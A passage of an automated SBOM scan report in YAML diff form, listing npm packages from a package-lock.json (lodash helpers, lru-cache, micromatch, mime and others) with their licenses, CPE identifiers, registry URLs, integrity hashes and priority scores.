/package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:lodash.isplainobject:lodash.isplainobject:4.0.6:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/lodash.isplainobject@4.0.6 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/lodash.isplainobject/-/lodash.isplainobject-4.0.6.tgz + integrity: sha512-oSXzaWypCMHkPC3NvBEaPHf0KsA5mvPrOPgQWDsbg8n7orZ290M0BmC/jgRZ4vcJ6DTAhjrsSYgdsW/F+MFOBA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 1ec5aad22a5b316a + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: lodash.isstring 4.0.1' + title: lodash.isstring 4.0.1 + description: 'Package discovered: lodash.isstring 4.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: f161741909d3d58f + name: lodash.isstring + version: 4.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:lodash.isstring:lodash.isstring:4.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/lodash.isstring@4.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/lodash.isstring/-/lodash.isstring-4.0.1.tgz + integrity: sha512-0wJxfxH1wgO3GrbuP+dTTk7op+6L41QCXbGINEmD+ny/G/eCqGzxyCsh7159S+mgDDcoarnBw6PC1PS5+wUGgw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 7962026049b4f49e + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: lodash.once 4.1.1' + title: lodash.once 4.1.1 + description: 'Package discovered: lodash.once 4.1.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: f5ead8ead936acd7 + name: lodash.once + version: 4.1.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:lodash.once:lodash.once:4.1.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/lodash.once@4.1.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/lodash.once/-/lodash.once-4.1.1.tgz + integrity: sha512-Sb487aTOCr9drQVL8pIxOzVhafOjZN9UU54hiN8PU3uAiSV7lx1yYNpbNmex2PK6dSJoNTSJUUswT651yww3Mg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: cf9c5c396fa8379f + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: long 5.3.2' + title: long 5.3.2 + description: 'Package discovered: long 5.3.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 22165934193ce3c8 + name: long + version: 5.3.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:long:long:5.3.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/long@5.3.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/long/-/long-5.3.2.tgz + integrity: sha512-mNAgZ1GmyNhD7AuqnTG3/VQ26o760+ZYBPKjPvugO8+nLbYfX6TVpJPseBvopbdY+qpZ/lKUnmEc1LeZYS3QAA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 4615c5000eb45f3d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: loose-envify 1.4.0' + title: loose-envify 1.4.0 + description: 'Package discovered: loose-envify 1.4.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 01ac139389c8bf08 + name: loose-envify + version: 1.4.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:loose-envify:loose-envify:1.4.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:loose-envify:loose_envify:1.4.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:loose_envify:loose-envify:1.4.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:loose_envify:loose_envify:1.4.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:loose:loose-envify:1.4.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:loose:loose_envify:1.4.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/loose-envify@1.4.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/loose-envify/-/loose-envify-1.4.0.tgz + integrity: sha512-lyuxPGr/Wfhrlem2CL/UcnUc1zcqKAImBDzukY7Y5F/yQiNdko6+fRLevlw1HgMySw7f611UIY408EtxRSoK3Q== + dependencies: + js-tokens: ^3.0.0 || ^4.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 8bf9ffa72cfbe889 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: lru-cache 10.4.3' + title: lru-cache 10.4.3 + description: 'Package discovered: lru-cache 10.4.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: d68cb2f643232396 + name: lru-cache + version: 10.4.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:isaacs:lru-cache:10.4.3:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/lru-cache@10.4.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/lru-cache/-/lru-cache-10.4.3.tgz + integrity: sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: a08719993444a9bd + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: lru-cache 6.0.0' + title: lru-cache 6.0.0 + description: 'Package discovered: lru-cache 6.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 3a3d54b6437f39f3 + name: lru-cache + version: 6.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:isaacs:lru-cache:6.0.0:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/lru-cache@6.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz + integrity: sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA== + dependencies: + yallist: ^4.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: fb9befbc81581725 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: lru-memoizer 2.3.0' + title: lru-memoizer 2.3.0 + description: 'Package discovered: lru-memoizer 2.3.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: adf63f866928cf12 + name: lru-memoizer + version: 2.3.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:lru-memoizer:lru-memoizer:2.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:lru-memoizer:lru_memoizer:2.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:lru_memoizer:lru-memoizer:2.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:lru_memoizer:lru_memoizer:2.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:lru:lru-memoizer:2.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:lru:lru_memoizer:2.3.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/lru-memoizer@2.3.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/lru-memoizer/-/lru-memoizer-2.3.0.tgz + integrity: sha512-GXn7gyHAMhO13WSKrIiNfztwxodVsP8IoZ3XfrJV4yH2x0/OeTO/FIaAHTY5YekdGgW94njfuKmyyt1E0mR6Ug== + dependencies: + lodash.clonedeep: ^4.5.0 + lru-cache: 6.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 03f163b26dd00375 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: lucide-react 0.376.0' + title: lucide-react 0.376.0 + description: 'Package discovered: lucide-react 0.376.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 9a372e50af0fe0ae + name: lucide-react + version: 0.376.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:lucide-react:lucide-react:0.376.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:lucide-react:lucide_react:0.376.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:lucide_react:lucide-react:0.376.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:lucide_react:lucide_react:0.376.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:lucide:lucide-react:0.376.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:lucide:lucide_react:0.376.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/lucide-react@0.376.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/lucide-react/-/lucide-react-0.376.0.tgz + integrity: sha512-g91IX3ERD6yUR1TL2dsL4BkcGygpZz/EsqjAeL/kcRQV0EApIOr/9eBfKhYOVyQIcGGuotFGjF3xKLHMEz+b7g== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 0f65ff516206127f + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: math-intrinsics 1.1.0' + title: math-intrinsics 1.1.0 + description: 'Package discovered: math-intrinsics 1.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 87a83232f7674dbc + name: math-intrinsics + version: 1.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:math-intrinsics:math-intrinsics:1.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:math-intrinsics:math_intrinsics:1.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:math_intrinsics:math-intrinsics:1.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:math_intrinsics:math_intrinsics:1.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:math:math-intrinsics:1.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:math:math_intrinsics:1.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/math-intrinsics@1.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/math-intrinsics/-/math-intrinsics-1.1.0.tgz + integrity: sha512-/IXtbwEk5HTPyEwyKX6hGkYXxM9nbj64B+ilVJnC/R6B0pH5G4V3b0pVbL7DBj4tkhBAppbQUlf6F6Xl9LHu1g== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 9efbed3ea63ec0cc + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: media-engine 1.0.3' + title: media-engine 1.0.3 + description: 'Package discovered: media-engine 1.0.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 1dbf081258d17462 + name: media-engine + version: 1.0.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:media-engine:media-engine:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:media-engine:media_engine:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:media_engine:media-engine:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:media_engine:media_engine:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:media:media-engine:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:media:media_engine:1.0.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/media-engine@1.0.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/media-engine/-/media-engine-1.0.3.tgz + integrity: sha512-aa5tG6sDoK+k70B9iEX1NeyfT8ObCKhNDs6lJVpwF6r8vhUfuKMslIcirq6HIUYuuUYLefcEQOn9bSBOvawtwg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 6ecc4376357a6aa5 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: media-typer 0.3.0' + title: media-typer 0.3.0 + description: 'Package discovered: media-typer 0.3.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: d88fe6586764efc9 + name: media-typer + version: 0.3.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:media-typer:media-typer:0.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:media-typer:media_typer:0.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:media_typer:media-typer:0.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:media_typer:media_typer:0.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:media:media-typer:0.3.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:media:media_typer:0.3.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/media-typer@0.3.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/media-typer/-/media-typer-0.3.0.tgz + integrity: sha512-dq+qelQ9akHpcOl/gUVRTxVIOkAJ1wR3QAvb4RsVjS8oVoFjDGTc679wJYmUmknUF5HwMLOgb5O+a3KxfWapPQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: d32acd7a2e9bf402 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: merge-descriptors 1.0.3' + title: merge-descriptors 1.0.3 + description: 'Package discovered: merge-descriptors 1.0.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 670d71ff9d8ed75e + name: merge-descriptors + version: 1.0.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:merge-descriptors:merge-descriptors:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:merge-descriptors:merge_descriptors:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:merge_descriptors:merge-descriptors:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:merge_descriptors:merge_descriptors:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:merge:merge-descriptors:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:merge:merge_descriptors:1.0.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/merge-descriptors@1.0.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/merge-descriptors/-/merge-descriptors-1.0.3.tgz + integrity: sha512-gaNvAS7TZ897/rVaZ0nMtAyxNyi/pdbjbAwUpFQpN70GqnVfOiXpeUUMKRBmzXaSQ8DdTX4/0ms62r2K+hE6mQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: b81185034826e168 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: merge2 1.4.1' + title: merge2 1.4.1 + description: 'Package discovered: merge2 1.4.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 49cc3c07a1505404 + name: merge2 + version: 1.4.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:merge2:merge2:1.4.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/merge2@1.4.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/merge2/-/merge2-1.4.1.tgz + integrity: sha512-8q7VEgMJW4J8tcfVPy8g09NcQwZdbwFEqhe/WZkoIzjn/3TGDwtOCYtXGxA3O8tPzpczCCDgv+P2P5y00ZJOOg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: b23a5664e0d696ec + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: methods 1.1.2' + title: methods 1.1.2 + description: 'Package discovered: methods 1.1.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: a17abee1ae67ac79 + name: methods + version: 1.1.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:methods:methods:1.1.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/methods@1.1.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/methods/-/methods-1.1.2.tgz + integrity: sha512-iclAHeNqNm68zFtnZ0e+1L2yUIdvzNoauKU4WBA3VvH/vPFieF7qfRlwUZU+DA9P9bPXIS90ulxoUoCH23sV2w== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: e5492a26182452ae + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: micromatch 4.0.8' + title: micromatch 4.0.8 + description: 'Package discovered: micromatch 4.0.8' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: dc31731ddf283ca7 + name: micromatch + version: 4.0.8 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:jonschlinkert:micromatch:4.0.8:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/micromatch@4.0.8 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/micromatch/-/micromatch-4.0.8.tgz + integrity: sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA== + dependencies: + braces: ^3.0.3 + picomatch: ^2.3.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: cdd82acabfa8e9e8 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: mime 1.6.0' + title: mime 1.6.0 + description: 'Package discovered: mime 1.6.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 10b23cab35239c6d + name: mime + version: 1.6.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:mime_project:mime:1.6.0:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/mime@1.6.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/mime/-/mime-1.6.0.tgz + integrity: sha512-x0Vn8spI+wuJ1O6S7gnbaQg8Pxh4NNHb7KSINmEWKiPE4RKOplvijn+NkmYmmRgP68mc70j2EbeTFRsrswaQeg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + 